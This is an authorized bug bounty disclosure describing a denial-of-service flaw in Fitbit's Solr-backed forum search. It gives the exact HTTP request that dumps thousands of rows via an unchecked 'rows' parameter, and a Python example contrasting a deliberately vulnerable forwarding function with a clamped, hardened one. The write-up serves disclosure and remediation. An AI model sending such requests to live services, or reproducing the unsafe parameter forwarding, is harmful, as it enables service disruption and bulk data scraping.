Authorized Bug Bounty Disclosure
Target: Fitbit.com
Bug Type: Denial of Service
Disclosure Verification: Fitbit Authorized Disclosure on 03-09-2018
Identified a method to queue up and download gigabytes, if not terabytes, of data from the Fitbit forums through a single web request 😳
Fitbit was extremely responsive and resolved this in a timely manner 😃
This is a permission bug at one location in Fitbit's Solr/Lucene-backed search, which let certain query parameters be manipulated by the caller. It was super interesting to research that tech, which is detailed here. Normally DoS (denial of service) is not within scope, but this was submitted as a general bug, with DoS potential ;)
Bug discovered: 2016-05-05
Bug Resolved: 2016-11-07
Sending the request below to [fitbit.com/search/solrForum], the server responds by dumping as many forum rows as the rows parameter asks for:
GET /search/solrForum?q=a&start=1&rows=9999&fq=(postStatus:0%20AND%20topicStatus:0) HTTP/1.1
Host: www.fitbit.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
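The request above works because the paging parameters reach the search backend unchecked. The following is an added illustration, not Fitbit's code: a hypothetical search front end that parses the browser's query string and builds the Solr request either by forwarding start/rows verbatim (the behaviour the payload abuses) or by clamping them to a server-side ceiling and pinning the filter query. The ceilings, the helper names and the default page size are assumptions.

```python
"""Clamping Solr paging parameters before forwarding a search request.

Added example for this write-up; it is not the vulnerable application's
code. The ceilings below are assumed values, not anything Fitbit used.
"""
from urllib.parse import parse_qs, urlencode, urlsplit

MAX_ROWS = 50        # assumed page-size ceiling
MAX_START = 10_000   # assumed deep-paging ceiling (large offsets are costly in Solr too)
DEFAULT_ROWS = 10    # assumed default page size

# Filter the forum search is meant to apply; in the hardened variant the
# caller can no longer replace it with a filter of their own choosing.
FORUM_FILTER = "(postStatus:0 AND topicStatus:0)"


def _int_param(params, name, default):
    """Return the first value of an integer query parameter, or the default."""
    try:
        return int(params.get(name, [default])[0])
    except (TypeError, ValueError):
        return default


def solr_params_unsafe(request_target):
    """Vulnerable variant: whatever the browser sends is what Solr receives."""
    qs = parse_qs(urlsplit(request_target).query)
    return {
        "q": qs.get("q", ["*:*"])[0],
        "fq": qs.get("fq", [FORUM_FILTER])[0],
        "start": _int_param(qs, "start", 0),
        "rows": _int_param(qs, "rows", DEFAULT_ROWS),
    }


def solr_params_hardened(request_target):
    """Hardened variant: bound start/rows and fix fq server-side so that one
    request cannot ask the index for everything it holds."""
    qs = parse_qs(urlsplit(request_target).query)
    rows = _int_param(qs, "rows", DEFAULT_ROWS)
    start = _int_param(qs, "start", 0)
    if rows < 1:
        rows = DEFAULT_ROWS            # reject 0/negative rather than pass them on
    return {
        "q": qs.get("q", ["*:*"])[0][:256],   # also bound the query text length
        "fq": FORUM_FILTER,                   # not caller-controlled
        "start": max(0, min(start, MAX_START)),
        "rows": min(rows, MAX_ROWS),
    }


def solr_query_string(params):
    """Serialise the chosen parameters for the backend request."""
    return urlencode(params)


# The request line from the disclosure, used here as sample input.
PAYLOAD = "/search/solrForum?q=a&start=1&rows=9999&fq=(postStatus:0%20AND%20topicStatus:0)"

if __name__ == "__main__":
    print("unsafe   :", solr_query_string(solr_params_unsafe(PAYLOAD)))
    print("hardened :", solr_query_string(solr_params_hardened(PAYLOAD)))
```

Clamping in the application is the quickest fix; the same ceiling can also be enforced inside Solr by setting rows as an invariant on the request handler in solrconfig.xml, so that no front-end bug can raise it again.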
It took a while to find the location, but through some research on the component, the services behind it could be identified. 😓
If used maliciously, this issue could cause a denial of service on the Fitbit platforms.